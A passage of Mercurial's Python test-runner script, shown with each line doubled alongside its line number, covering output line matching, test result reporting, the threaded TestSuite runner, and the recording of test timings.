1970 continue
1971 postout.append(b' ' + el)
1971 postout.append(b' ' + el)
1972 return pos, postout, warnonly
1972 return pos, postout, warnonly
1973
1973
1974 def _process_cmd_line(self, cmd_line, pos, postout, after):
1974 def _process_cmd_line(self, cmd_line, pos, postout, after):
1975 """process a "command" part of a line from unified test output"""
1975 """process a "command" part of a line from unified test output"""
1976 if cmd_line:
1976 if cmd_line:
1977 # Add on last return code.
1977 # Add on last return code.
1978 ret = int(cmd_line.split()[1])
1978 ret = int(cmd_line.split()[1])
1979 if ret != 0:
1979 if ret != 0:
1980 postout.append(b' [%d]\n' % ret)
1980 postout.append(b' [%d]\n' % ret)
1981 if pos in after:
1981 if pos in after:
1982 # Merge in non-active test bits.
1982 # Merge in non-active test bits.
1983 postout += after.pop(pos)
1983 postout += after.pop(pos)
1984 pos = int(cmd_line.split()[0])
1984 pos = int(cmd_line.split()[0])
1985 return pos, postout
1985 return pos, postout
1986
1986
1987 @staticmethod
1987 @staticmethod
1988 def rematch(el, l):
1988 def rematch(el, l):
1989 try:
1989 try:
1990 # parse any flags at the beginning of the regex. Only 'i' is
1990 # parse any flags at the beginning of the regex. Only 'i' is
1991 # supported right now, but this should be easy to extend.
1991 # supported right now, but this should be easy to extend.
1992 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
1992 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
1993 flags = flags or b''
1993 flags = flags or b''
1994 el = flags + b'(?:' + el + b')'
1994 el = flags + b'(?:' + el + b')'
1995 # use \Z to ensure that the regex matches to the end of the string
1995 # use \Z to ensure that the regex matches to the end of the string
1996 if os.name == 'nt':
1996 if os.name == 'nt':
1997 return re.match(el + br'\r?\n\Z', l)
1997 return re.match(el + br'\r?\n\Z', l)
1998 return re.match(el + br'\n\Z', l)
1998 return re.match(el + br'\n\Z', l)
1999 except re.error:
1999 except re.error:
2000 # el is an invalid regex
2000 # el is an invalid regex
2001 return False
2001 return False
2002
2002
2003 @staticmethod
2003 @staticmethod
2004 def globmatch(el, l):
2004 def globmatch(el, l):
2005 # The only supported special characters are * and ? plus / which also
2005 # The only supported special characters are * and ? plus / which also
2006 # matches \ on windows. Escaping of these characters is supported.
2006 # matches \ on windows. Escaping of these characters is supported.
2007 if el + b'\n' == l:
2007 if el + b'\n' == l:
2008 if os.altsep:
2008 if os.altsep:
2009 # matching on "/" is not needed for this line
2009 # matching on "/" is not needed for this line
2010 for pat in checkcodeglobpats:
2010 for pat in checkcodeglobpats:
2011 if pat.match(el):
2011 if pat.match(el):
2012 return True
2012 return True
2013 return b'-glob'
2013 return b'-glob'
2014 return True
2014 return True
2015 el = el.replace(b'$LOCALIP', b'*')
2015 el = el.replace(b'$LOCALIP', b'*')
2016 i, n = 0, len(el)
2016 i, n = 0, len(el)
2017 res = b''
2017 res = b''
2018 while i < n:
2018 while i < n:
2019 c = el[i : i + 1]
2019 c = el[i : i + 1]
2020 i += 1
2020 i += 1
2021 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2021 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2022 res += el[i - 1 : i + 1]
2022 res += el[i - 1 : i + 1]
2023 i += 1
2023 i += 1
2024 elif c == b'*':
2024 elif c == b'*':
2025 res += b'.*'
2025 res += b'.*'
2026 elif c == b'?':
2026 elif c == b'?':
2027 res += b'.'
2027 res += b'.'
2028 elif c == b'/' and os.altsep:
2028 elif c == b'/' and os.altsep:
2029 res += b'[/\\\\]'
2029 res += b'[/\\\\]'
2030 else:
2030 else:
2031 res += re.escape(c)
2031 res += re.escape(c)
2032 return TTest.rematch(res, l)
2032 return TTest.rematch(res, l)
2033
2033
2034 def linematch(self, el, l):
2034 def linematch(self, el, l):
2035 if el == l: # perfect match (fast)
2035 if el == l: # perfect match (fast)
2036 return True, True
2036 return True, True
2037 retry = False
2037 retry = False
2038 if isoptional(el):
2038 if isoptional(el):
2039 retry = "retry"
2039 retry = "retry"
2040 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2040 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2041 else:
2041 else:
2042 m = optline.match(el)
2042 m = optline.match(el)
2043 if m:
2043 if m:
2044 conditions = [c for c in m.group(2).split(b' ')]
2044 conditions = [c for c in m.group(2).split(b' ')]
2045
2045
2046 el = m.group(1) + b"\n"
2046 el = m.group(1) + b"\n"
2047 if not self._iftest(conditions):
2047 if not self._iftest(conditions):
2048 # listed feature missing, should not match
2048 # listed feature missing, should not match
2049 return "retry", False
2049 return "retry", False
2050
2050
2051 if el.endswith(b" (esc)\n"):
2051 if el.endswith(b" (esc)\n"):
2052 if PYTHON3:
2052 if PYTHON3:
2053 el = el[:-7].decode('unicode_escape') + '\n'
2053 el = el[:-7].decode('unicode_escape') + '\n'
2054 el = el.encode('utf-8')
2054 el = el.encode('utf-8')
2055 else:
2055 else:
2056 el = el[:-7].decode('string-escape') + '\n'
2056 el = el[:-7].decode('string-escape') + '\n'
2057 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2057 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2058 return True, True
2058 return True, True
2059 if el.endswith(b" (re)\n"):
2059 if el.endswith(b" (re)\n"):
2060 return (TTest.rematch(el[:-6], l) or retry), False
2060 return (TTest.rematch(el[:-6], l) or retry), False
2061 if el.endswith(b" (glob)\n"):
2061 if el.endswith(b" (glob)\n"):
2062 # ignore '(glob)' added to l by 'replacements'
2062 # ignore '(glob)' added to l by 'replacements'
2063 if l.endswith(b" (glob)\n"):
2063 if l.endswith(b" (glob)\n"):
2064 l = l[:-8] + b"\n"
2064 l = l[:-8] + b"\n"
2065 return (TTest.globmatch(el[:-8], l) or retry), False
2065 return (TTest.globmatch(el[:-8], l) or retry), False
2066 if os.altsep:
2066 if os.altsep:
2067 _l = l.replace(b'\\', b'/')
2067 _l = l.replace(b'\\', b'/')
2068 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2068 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2069 return True, True
2069 return True, True
2070 return retry, True
2070 return retry, True
2071
2071
2072 @staticmethod
2072 @staticmethod
2073 def parsehghaveoutput(lines):
2073 def parsehghaveoutput(lines):
2074 '''Parse hghave log lines.
2074 '''Parse hghave log lines.
2075
2075
2076 Return tuple of lists (missing, failed):
2076 Return tuple of lists (missing, failed):
2077 * the missing/unknown features
2077 * the missing/unknown features
2078 * the features for which existence check failed'''
2078 * the features for which existence check failed'''
2079 missing = []
2079 missing = []
2080 failed = []
2080 failed = []
2081 for line in lines:
2081 for line in lines:
2082 if line.startswith(TTest.SKIPPED_PREFIX):
2082 if line.startswith(TTest.SKIPPED_PREFIX):
2083 line = line.splitlines()[0]
2083 line = line.splitlines()[0]
2084 missing.append(
2084 missing.append(
2085 line[len(TTest.SKIPPED_PREFIX) :].decode('utf-8')
2085 line[len(TTest.SKIPPED_PREFIX) :].decode('utf-8')
2086 )
2086 )
2087 elif line.startswith(TTest.FAILED_PREFIX):
2087 elif line.startswith(TTest.FAILED_PREFIX):
2088 line = line.splitlines()[0]
2088 line = line.splitlines()[0]
2089 failed.append(line[len(TTest.FAILED_PREFIX) :].decode('utf-8'))
2089 failed.append(line[len(TTest.FAILED_PREFIX) :].decode('utf-8'))
2090
2090
2091 return missing, failed
2091 return missing, failed
2092
2092
2093 @staticmethod
2093 @staticmethod
2094 def _escapef(m):
2094 def _escapef(m):
2095 return TTest.ESCAPEMAP[m.group(0)]
2095 return TTest.ESCAPEMAP[m.group(0)]
2096
2096
2097 @staticmethod
2097 @staticmethod
2098 def _stringescape(s):
2098 def _stringescape(s):
2099 return TTest.ESCAPESUB(TTest._escapef, s)
2099 return TTest.ESCAPESUB(TTest._escapef, s)
2100
2100
2101
2101
2102 iolock = threading.RLock()
2102 iolock = threading.RLock()
2103 firstlock = threading.RLock()
2103 firstlock = threading.RLock()
2104 firsterror = False
2104 firsterror = False
2105
2105
2106
2106
2107 class TestResult(unittest._TextTestResult):
2107 class TestResult(unittest._TextTestResult):
2108 """Holds results when executing via unittest."""
2108 """Holds results when executing via unittest."""
2109
2109
2110 # Don't worry too much about accessing the non-public _TextTestResult.
2110 # Don't worry too much about accessing the non-public _TextTestResult.
2111 # It is relatively common in Python testing tools.
2111 # It is relatively common in Python testing tools.
2112 def __init__(self, options, *args, **kwargs):
2112 def __init__(self, options, *args, **kwargs):
2113 super(TestResult, self).__init__(*args, **kwargs)
2113 super(TestResult, self).__init__(*args, **kwargs)
2114
2114
2115 self._options = options
2115 self._options = options
2116
2116
2117 # unittest.TestResult didn't have skipped until 2.7. We need to
2117 # unittest.TestResult didn't have skipped until 2.7. We need to
2118 # polyfill it.
2118 # polyfill it.
2119 self.skipped = []
2119 self.skipped = []
2120
2120
2121 # We have a custom "ignored" result that isn't present in any Python
2121 # We have a custom "ignored" result that isn't present in any Python
2122 # unittest implementation. It is very similar to skipped. It may make
2122 # unittest implementation. It is very similar to skipped. It may make
2123 # sense to map it into skip some day.
2123 # sense to map it into skip some day.
2124 self.ignored = []
2124 self.ignored = []
2125
2125
2126 self.times = []
2126 self.times = []
2127 self._firststarttime = None
2127 self._firststarttime = None
2128 # Data stored for the benefit of generating xunit reports.
2128 # Data stored for the benefit of generating xunit reports.
2129 self.successes = []
2129 self.successes = []
2130 self.faildata = {}
2130 self.faildata = {}
2131
2131
2132 if options.color == 'auto':
2132 if options.color == 'auto':
2133 self.color = pygmentspresent and self.stream.isatty()
2133 self.color = pygmentspresent and self.stream.isatty()
2134 elif options.color == 'never':
2134 elif options.color == 'never':
2135 self.color = False
2135 self.color = False
2136 else: # 'always', for testing purposes
2136 else: # 'always', for testing purposes
2137 self.color = pygmentspresent
2137 self.color = pygmentspresent
2138
2138
2139 def onStart(self, test):
2139 def onStart(self, test):
2140 """ Can be overriden by custom TestResult
2140 """ Can be overriden by custom TestResult
2141 """
2141 """
2142
2142
2143 def onEnd(self):
2143 def onEnd(self):
2144 """ Can be overriden by custom TestResult
2144 """ Can be overriden by custom TestResult
2145 """
2145 """
2146
2146
2147 def addFailure(self, test, reason):
2147 def addFailure(self, test, reason):
2148 self.failures.append((test, reason))
2148 self.failures.append((test, reason))
2149
2149
2150 if self._options.first:
2150 if self._options.first:
2151 self.stop()
2151 self.stop()
2152 else:
2152 else:
2153 with iolock:
2153 with iolock:
2154 if reason == "timed out":
2154 if reason == "timed out":
2155 self.stream.write('t')
2155 self.stream.write('t')
2156 else:
2156 else:
2157 if not self._options.nodiff:
2157 if not self._options.nodiff:
2158 self.stream.write('\n')
2158 self.stream.write('\n')
2159 # Exclude the '\n' from highlighting to lex correctly
2159 # Exclude the '\n' from highlighting to lex correctly
2160 formatted = 'ERROR: %s output changed\n' % test
2160 formatted = 'ERROR: %s output changed\n' % test
2161 self.stream.write(highlightmsg(formatted, self.color))
2161 self.stream.write(highlightmsg(formatted, self.color))
2162 self.stream.write('!')
2162 self.stream.write('!')
2163
2163
2164 self.stream.flush()
2164 self.stream.flush()
2165
2165
2166 def addSuccess(self, test):
2166 def addSuccess(self, test):
2167 with iolock:
2167 with iolock:
2168 super(TestResult, self).addSuccess(test)
2168 super(TestResult, self).addSuccess(test)
2169 self.successes.append(test)
2169 self.successes.append(test)
2170
2170
2171 def addError(self, test, err):
2171 def addError(self, test, err):
2172 super(TestResult, self).addError(test, err)
2172 super(TestResult, self).addError(test, err)
2173 if self._options.first:
2173 if self._options.first:
2174 self.stop()
2174 self.stop()
2175
2175
2176 # Polyfill.
2176 # Polyfill.
2177 def addSkip(self, test, reason):
2177 def addSkip(self, test, reason):
2178 self.skipped.append((test, reason))
2178 self.skipped.append((test, reason))
2179 with iolock:
2179 with iolock:
2180 if self.showAll:
2180 if self.showAll:
2181 self.stream.writeln('skipped %s' % reason)
2181 self.stream.writeln('skipped %s' % reason)
2182 else:
2182 else:
2183 self.stream.write('s')
2183 self.stream.write('s')
2184 self.stream.flush()
2184 self.stream.flush()
2185
2185
2186 def addIgnore(self, test, reason):
2186 def addIgnore(self, test, reason):
2187 self.ignored.append((test, reason))
2187 self.ignored.append((test, reason))
2188 with iolock:
2188 with iolock:
2189 if self.showAll:
2189 if self.showAll:
2190 self.stream.writeln('ignored %s' % reason)
2190 self.stream.writeln('ignored %s' % reason)
2191 else:
2191 else:
2192 if reason not in ('not retesting', "doesn't match keyword"):
2192 if reason not in ('not retesting', "doesn't match keyword"):
2193 self.stream.write('i')
2193 self.stream.write('i')
2194 else:
2194 else:
2195 self.testsRun += 1
2195 self.testsRun += 1
2196 self.stream.flush()
2196 self.stream.flush()
2197
2197
2198 def addOutputMismatch(self, test, ret, got, expected):
2198 def addOutputMismatch(self, test, ret, got, expected):
2199 """Record a mismatch in test output for a particular test."""
2199 """Record a mismatch in test output for a particular test."""
2200 if self.shouldStop or firsterror:
2200 if self.shouldStop or firsterror:
2201 # don't print, some other test case already failed and
2201 # don't print, some other test case already failed and
2202 # printed, we're just stale and probably failed due to our
2202 # printed, we're just stale and probably failed due to our
2203 # temp dir getting cleaned up.
2203 # temp dir getting cleaned up.
2204 return
2204 return
2205
2205
2206 accepted = False
2206 accepted = False
2207 lines = []
2207 lines = []
2208
2208
2209 with iolock:
2209 with iolock:
2210 if self._options.nodiff:
2210 if self._options.nodiff:
2211 pass
2211 pass
2212 elif self._options.view:
2212 elif self._options.view:
2213 v = self._options.view
2213 v = self._options.view
2214 subprocess.call(
2214 subprocess.call(
2215 r'"%s" "%s" "%s"'
2215 r'"%s" "%s" "%s"'
2216 % (v, _strpath(test.refpath), _strpath(test.errpath)),
2216 % (v, _strpath(test.refpath), _strpath(test.errpath)),
2217 shell=True,
2217 shell=True,
2218 )
2218 )
2219 else:
2219 else:
2220 servefail, lines = getdiff(
2220 servefail, lines = getdiff(
2221 expected, got, test.refpath, test.errpath
2221 expected, got, test.refpath, test.errpath
2222 )
2222 )
2223 self.stream.write('\n')
2223 self.stream.write('\n')
2224 for line in lines:
2224 for line in lines:
2225 line = highlightdiff(line, self.color)
2225 line = highlightdiff(line, self.color)
2226 if PYTHON3:
2226 if PYTHON3:
2227 self.stream.flush()
2227 self.stream.flush()
2228 self.stream.buffer.write(line)
2228 self.stream.buffer.write(line)
2229 self.stream.buffer.flush()
2229 self.stream.buffer.flush()
2230 else:
2230 else:
2231 self.stream.write(line)
2231 self.stream.write(line)
2232 self.stream.flush()
2232 self.stream.flush()
2233
2233
2234 if servefail:
2234 if servefail:
2235 raise test.failureException(
2235 raise test.failureException(
2236 'server failed to start (HGPORT=%s)' % test._startport
2236 'server failed to start (HGPORT=%s)' % test._startport
2237 )
2237 )
2238
2238
2239 # handle interactive prompt without releasing iolock
2239 # handle interactive prompt without releasing iolock
2240 if self._options.interactive:
2240 if self._options.interactive:
2241 if test.readrefout() != expected:
2241 if test.readrefout() != expected:
2242 self.stream.write(
2242 self.stream.write(
2243 'Reference output has changed (run again to prompt '
2243 'Reference output has changed (run again to prompt '
2244 'changes)'
2244 'changes)'
2245 )
2245 )
2246 else:
2246 else:
2247 self.stream.write('Accept this change? [n] ')
2247 self.stream.write('Accept this change? [n] ')
2248 self.stream.flush()
2248 self.stream.flush()
2249 answer = sys.stdin.readline().strip()
2249 answer = sys.stdin.readline().strip()
2250 if answer.lower() in ('y', 'yes'):
2250 if answer.lower() in ('y', 'yes'):
2251 if test.path.endswith(b'.t'):
2251 if test.path.endswith(b'.t'):
2252 rename(test.errpath, test.path)
2252 rename(test.errpath, test.path)
2253 else:
2253 else:
2254 rename(test.errpath, '%s.out' % test.path)
2254 rename(test.errpath, '%s.out' % test.path)
2255 accepted = True
2255 accepted = True
2256 if not accepted:
2256 if not accepted:
2257 self.faildata[test.name] = b''.join(lines)
2257 self.faildata[test.name] = b''.join(lines)
2258
2258
2259 return accepted
2259 return accepted
2260
2260
2261 def startTest(self, test):
2261 def startTest(self, test):
2262 super(TestResult, self).startTest(test)
2262 super(TestResult, self).startTest(test)
2263
2263
2264 # os.times module computes the user time and system time spent by
2264 # os.times module computes the user time and system time spent by
2265 # child's processes along with real elapsed time taken by a process.
2265 # child's processes along with real elapsed time taken by a process.
2266 # This module has one limitation. It can only work for Linux user
2266 # This module has one limitation. It can only work for Linux user
2267 # and not for Windows. Hence why we fall back to another function
2267 # and not for Windows. Hence why we fall back to another function
2268 # for wall time calculations.
2268 # for wall time calculations.
2269 test.started_times = os.times()
2269 test.started_times = os.times()
2270 # TODO use a monotonic clock once support for Python 2.7 is dropped.
2270 # TODO use a monotonic clock once support for Python 2.7 is dropped.
2271 test.started_time = time.time()
2271 test.started_time = time.time()
2272 if self._firststarttime is None: # thread racy but irrelevant
2272 if self._firststarttime is None: # thread racy but irrelevant
2273 self._firststarttime = test.started_time
2273 self._firststarttime = test.started_time
2274
2274
2275 def stopTest(self, test, interrupted=False):
2275 def stopTest(self, test, interrupted=False):
2276 super(TestResult, self).stopTest(test)
2276 super(TestResult, self).stopTest(test)
2277
2277
2278 test.stopped_times = os.times()
2278 test.stopped_times = os.times()
2279 stopped_time = time.time()
2279 stopped_time = time.time()
2280
2280
2281 starttime = test.started_times
2281 starttime = test.started_times
2282 endtime = test.stopped_times
2282 endtime = test.stopped_times
2283 origin = self._firststarttime
2283 origin = self._firststarttime
2284 self.times.append(
2284 self.times.append(
2285 (
2285 (
2286 test.name,
2286 test.name,
2287 endtime[2] - starttime[2], # user space CPU time
2287 endtime[2] - starttime[2], # user space CPU time
2288 endtime[3] - starttime[3], # sys space CPU time
2288 endtime[3] - starttime[3], # sys space CPU time
2289 stopped_time - test.started_time, # real time
2289 stopped_time - test.started_time, # real time
2290 test.started_time - origin, # start date in run context
2290 test.started_time - origin, # start date in run context
2291 stopped_time - origin, # end date in run context
2291 stopped_time - origin, # end date in run context
2292 )
2292 )
2293 )
2293 )
2294
2294
2295 if interrupted:
2295 if interrupted:
2296 with iolock:
2296 with iolock:
2297 self.stream.writeln(
2297 self.stream.writeln(
2298 'INTERRUPTED: %s (after %d seconds)'
2298 'INTERRUPTED: %s (after %d seconds)'
2299 % (test.name, self.times[-1][3])
2299 % (test.name, self.times[-1][3])
2300 )
2300 )
2301
2301
2302
2302
2303 def getTestResult():
2303 def getTestResult():
2304 """
2304 """
2305 Returns the relevant test result
2305 Returns the relevant test result
2306 """
2306 """
2307 if "CUSTOM_TEST_RESULT" in os.environ:
2307 if "CUSTOM_TEST_RESULT" in os.environ:
2308 testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
2308 testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
2309 return testresultmodule.TestResult
2309 return testresultmodule.TestResult
2310 else:
2310 else:
2311 return TestResult
2311 return TestResult
2312
2312
2313
2313
2314 class TestSuite(unittest.TestSuite):
2314 class TestSuite(unittest.TestSuite):
2315 """Custom unittest TestSuite that knows how to execute Mercurial tests."""
2315 """Custom unittest TestSuite that knows how to execute Mercurial tests."""
2316
2316
2317 def __init__(
2317 def __init__(
2318 self,
2318 self,
2319 testdir,
2319 testdir,
2320 jobs=1,
2320 jobs=1,
2321 whitelist=None,
2321 whitelist=None,
2322 blacklist=None,
2322 blacklist=None,
2323 retest=False,
2323 retest=False,
2324 keywords=None,
2324 keywords=None,
2325 loop=False,
2325 loop=False,
2326 runs_per_test=1,
2326 runs_per_test=1,
2327 loadtest=None,
2327 loadtest=None,
2328 showchannels=False,
2328 showchannels=False,
2329 *args,
2329 *args,
2330 **kwargs
2330 **kwargs
2331 ):
2331 ):
2332 """Create a new instance that can run tests with a configuration.
2332 """Create a new instance that can run tests with a configuration.
2333
2333
2334 testdir specifies the directory where tests are executed from. This
2334 testdir specifies the directory where tests are executed from. This
2335 is typically the ``tests`` directory from Mercurial's source
2335 is typically the ``tests`` directory from Mercurial's source
2336 repository.
2336 repository.
2337
2337
2338 jobs specifies the number of jobs to run concurrently. Each test
2338 jobs specifies the number of jobs to run concurrently. Each test
2339 executes on its own thread. Tests actually spawn new processes, so
2339 executes on its own thread. Tests actually spawn new processes, so
2340 state mutation should not be an issue.
2340 state mutation should not be an issue.
2341
2341
2342 If there is only one job, it will use the main thread.
2342 If there is only one job, it will use the main thread.
2343
2343
2344 whitelist and blacklist denote tests that have been whitelisted and
2344 whitelist and blacklist denote tests that have been whitelisted and
2345 blacklisted, respectively. These arguments don't belong in TestSuite.
2345 blacklisted, respectively. These arguments don't belong in TestSuite.
2346 Instead, whitelist and blacklist should be handled by the thing that
2346 Instead, whitelist and blacklist should be handled by the thing that
2347 populates the TestSuite with tests. They are present to preserve
2347 populates the TestSuite with tests. They are present to preserve
2348 backwards compatible behavior which reports skipped tests as part
2348 backwards compatible behavior which reports skipped tests as part
2349 of the results.
2349 of the results.
2350
2350
2351 retest denotes whether to retest failed tests. This arguably belongs
2351 retest denotes whether to retest failed tests. This arguably belongs
2352 outside of TestSuite.
2352 outside of TestSuite.
2353
2353
2354 keywords denotes key words that will be used to filter which tests
2354 keywords denotes key words that will be used to filter which tests
2355 to execute. This arguably belongs outside of TestSuite.
2355 to execute. This arguably belongs outside of TestSuite.
2356
2356
2357 loop denotes whether to loop over tests forever.
2357 loop denotes whether to loop over tests forever.
2358 """
2358 """
2359 super(TestSuite, self).__init__(*args, **kwargs)
2359 super(TestSuite, self).__init__(*args, **kwargs)
2360
2360
2361 self._jobs = jobs
2361 self._jobs = jobs
2362 self._whitelist = whitelist
2362 self._whitelist = whitelist
2363 self._blacklist = blacklist
2363 self._blacklist = blacklist
2364 self._retest = retest
2364 self._retest = retest
2365 self._keywords = keywords
2365 self._keywords = keywords
2366 self._loop = loop
2366 self._loop = loop
2367 self._runs_per_test = runs_per_test
2367 self._runs_per_test = runs_per_test
2368 self._loadtest = loadtest
2368 self._loadtest = loadtest
2369 self._showchannels = showchannels
2369 self._showchannels = showchannels
2370
2370
2371 def run(self, result):
2371 def run(self, result):
2372 # We have a number of filters that need to be applied. We do this
2372 # We have a number of filters that need to be applied. We do this
2373 # here instead of inside Test because it makes the running logic for
2373 # here instead of inside Test because it makes the running logic for
2374 # Test simpler.
2374 # Test simpler.
2375 tests = []
2375 tests = []
2376 num_tests = [0]
2376 num_tests = [0]
2377 for test in self._tests:
2377 for test in self._tests:
2378
2378
2379 def get():
2379 def get():
2380 num_tests[0] += 1
2380 num_tests[0] += 1
2381 if getattr(test, 'should_reload', False):
2381 if getattr(test, 'should_reload', False):
2382 return self._loadtest(test, num_tests[0])
2382 return self._loadtest(test, num_tests[0])
2383 return test
2383 return test
2384
2384
2385 if not os.path.exists(test.path):
2385 if not os.path.exists(test.path):
2386 result.addSkip(test, "Doesn't exist")
2386 result.addSkip(test, "Doesn't exist")
2387 continue
2387 continue
2388
2388
2389 if not (self._whitelist and test.bname in self._whitelist):
2389 if not (self._whitelist and test.bname in self._whitelist):
2390 if self._blacklist and test.bname in self._blacklist:
2390 if self._blacklist and test.bname in self._blacklist:
2391 result.addSkip(test, 'blacklisted')
2391 result.addSkip(test, 'blacklisted')
2392 continue
2392 continue
2393
2393
2394 if self._retest and not os.path.exists(test.errpath):
2394 if self._retest and not os.path.exists(test.errpath):
2395 result.addIgnore(test, 'not retesting')
2395 result.addIgnore(test, 'not retesting')
2396 continue
2396 continue
2397
2397
2398 if self._keywords:
2398 if self._keywords:
2399 with open(test.path, 'rb') as f:
2399 with open(test.path, 'rb') as f:
2400 t = f.read().lower() + test.bname.lower()
2400 t = f.read().lower() + test.bname.lower()
2401 ignored = False
2401 ignored = False
2402 for k in self._keywords.lower().split():
2402 for k in self._keywords.lower().split():
2403 if k not in t:
2403 if k not in t:
2404 result.addIgnore(test, "doesn't match keyword")
2404 result.addIgnore(test, "doesn't match keyword")
2405 ignored = True
2405 ignored = True
2406 break
2406 break
2407
2407
2408 if ignored:
2408 if ignored:
2409 continue
2409 continue
2410 for _ in xrange(self._runs_per_test):
2410 for _ in xrange(self._runs_per_test):
2411 tests.append(get())
2411 tests.append(get())
2412
2412
2413 runtests = list(tests)
2413 runtests = list(tests)
2414 done = queue.Queue()
2414 done = queue.Queue()
2415 running = 0
2415 running = 0
2416
2416
2417 channels = [""] * self._jobs
2417 channels = [""] * self._jobs
2418
2418
2419 def job(test, result):
2419 def job(test, result):
2420 for n, v in enumerate(channels):
2420 for n, v in enumerate(channels):
2421 if not v:
2421 if not v:
2422 channel = n
2422 channel = n
2423 break
2423 break
2424 else:
2424 else:
2425 raise ValueError('Could not find output channel')
2425 raise ValueError('Could not find output channel')
2426 channels[channel] = "=" + test.name[5:].split(".")[0]
2426 channels[channel] = "=" + test.name[5:].split(".")[0]
2427 try:
2427 try:
2428 test(result)
2428 test(result)
2429 done.put(None)
2429 done.put(None)
2430 except KeyboardInterrupt:
2430 except KeyboardInterrupt:
2431 pass
2431 pass
2432 except: # re-raises
2432 except: # re-raises
2433 done.put(('!', test, 'run-test raised an error, see traceback'))
2433 done.put(('!', test, 'run-test raised an error, see traceback'))
2434 raise
2434 raise
2435 finally:
2435 finally:
2436 try:
2436 try:
2437 channels[channel] = ''
2437 channels[channel] = ''
2438 except IndexError:
2438 except IndexError:
2439 pass
2439 pass
2440
2440
2441 def stat():
2441 def stat():
2442 count = 0
2442 count = 0
2443 while channels:
2443 while channels:
2444 d = '\n%03s ' % count
2444 d = '\n%03s ' % count
2445 for n, v in enumerate(channels):
2445 for n, v in enumerate(channels):
2446 if v:
2446 if v:
2447 d += v[0]
2447 d += v[0]
2448 channels[n] = v[1:] or '.'
2448 channels[n] = v[1:] or '.'
2449 else:
2449 else:
2450 d += ' '
2450 d += ' '
2451 d += ' '
2451 d += ' '
2452 with iolock:
2452 with iolock:
2453 sys.stdout.write(d + ' ')
2453 sys.stdout.write(d + ' ')
2454 sys.stdout.flush()
2454 sys.stdout.flush()
2455 for x in xrange(10):
2455 for x in xrange(10):
2456 if channels:
2456 if channels:
2457 time.sleep(0.1)
2457 time.sleep(0.1)
2458 count += 1
2458 count += 1
2459
2459
2460 stoppedearly = False
2460 stoppedearly = False
2461
2461
2462 if self._showchannels:
2462 if self._showchannels:
2463 statthread = threading.Thread(target=stat, name="stat")
2463 statthread = threading.Thread(target=stat, name="stat")
2464 statthread.start()
2464 statthread.start()
2465
2465
2466 try:
2466 try:
2467 while tests or running:
2467 while tests or running:
2468 if not done.empty() or running == self._jobs or not tests:
2468 if not done.empty() or running == self._jobs or not tests:
2469 try:
2469 try:
2470 done.get(True, 1)
2470 done.get(True, 1)
2471 running -= 1
2471 running -= 1
2472 if result and result.shouldStop:
2472 if result and result.shouldStop:
2473 stoppedearly = True
2473 stoppedearly = True
2474 break
2474 break
2475 except queue.Empty:
2475 except queue.Empty:
2476 continue
2476 continue
2477 if tests and not running == self._jobs:
2477 if tests and not running == self._jobs:
2478 test = tests.pop(0)
2478 test = tests.pop(0)
2479 if self._loop:
2479 if self._loop:
2480 if getattr(test, 'should_reload', False):
2480 if getattr(test, 'should_reload', False):
2481 num_tests[0] += 1
2481 num_tests[0] += 1
2482 tests.append(self._loadtest(test, num_tests[0]))
2482 tests.append(self._loadtest(test, num_tests[0]))
2483 else:
2483 else:
2484 tests.append(test)
2484 tests.append(test)
2485 if self._jobs == 1:
2485 if self._jobs == 1:
2486 job(test, result)
2486 job(test, result)
2487 else:
2487 else:
2488 t = threading.Thread(
2488 t = threading.Thread(
2489 target=job, name=test.name, args=(test, result)
2489 target=job, name=test.name, args=(test, result)
2490 )
2490 )
2491 t.start()
2491 t.start()
2492 running += 1
2492 running += 1
2493
2493
2494 # If we stop early we still need to wait on started tests to
2494 # If we stop early we still need to wait on started tests to
2495 # finish. Otherwise, there is a race between the test completing
2495 # finish. Otherwise, there is a race between the test completing
2496 # and the test's cleanup code running. This could result in the
2496 # and the test's cleanup code running. This could result in the
2497 # test reporting incorrect.
2497 # test reporting incorrect.
2498 if stoppedearly:
2498 if stoppedearly:
2499 while running:
2499 while running:
2500 try:
2500 try:
2501 done.get(True, 1)
2501 done.get(True, 1)
2502 running -= 1
2502 running -= 1
2503 except queue.Empty:
2503 except queue.Empty:
2504 continue
2504 continue
2505 except KeyboardInterrupt:
2505 except KeyboardInterrupt:
2506 for test in runtests:
2506 for test in runtests:
2507 test.abort()
2507 test.abort()
2508
2508
2509 channels = []
2509 channels = []
2510
2510
2511 return result
2511 return result
2512
2512
2513
2513
2514 # Save the most recent 5 wall-clock runtimes of each test to a
2514 # Save the most recent 5 wall-clock runtimes of each test to a
2515 # human-readable text file named .testtimes. Tests are sorted
2515 # human-readable text file named .testtimes. Tests are sorted
2516 # alphabetically, while times for each test are listed from oldest to
2516 # alphabetically, while times for each test are listed from oldest to
2517 # newest.
2517 # newest.
2518
2518
2519
2519
2520 def loadtimes(outputdir):
2520 def loadtimes(outputdir):
2521 times = []
2521 times = []
2522 try:
2522 try:
2523 with open(os.path.join(outputdir, b'.testtimes')) as fp:
2523 with open(os.path.join(outputdir, b'.testtimes')) as fp:
2524 for line in fp:
2524 for line in fp:
2525 m = re.match('(.*?) ([0-9. ]+)', line)
2525 m = re.match('(.*?) ([0-9. ]+)', line)
2526 times.append(
2526 times.append(
2527 (m.group(1), [float(t) for t in m.group(2).split()])
2527 (m.group(1), [float(t) for t in m.group(2).split()])
2528 )
2528 )
2529 except IOError as err:
2529 except IOError as err:
2530 if err.errno != errno.ENOENT:
2530 if err.errno != errno.ENOENT:
2531 raise
2531 raise
2532 return times
2532 return times
2533
2533
2534
2534
2535 def savetimes(outputdir, result):
2535 def savetimes(outputdir, result):
2536 saved = dict(loadtimes(outputdir))
2536 saved = dict(loadtimes(outputdir))
2537 maxruns = 5
2537 maxruns = 5
2538 skipped = set([str(t[0]) for t in result.skipped])
2538 skipped = set([str(t[0]) for t in result.skipped])
2539 for tdata in result.times:
2539 for tdata in result.times:
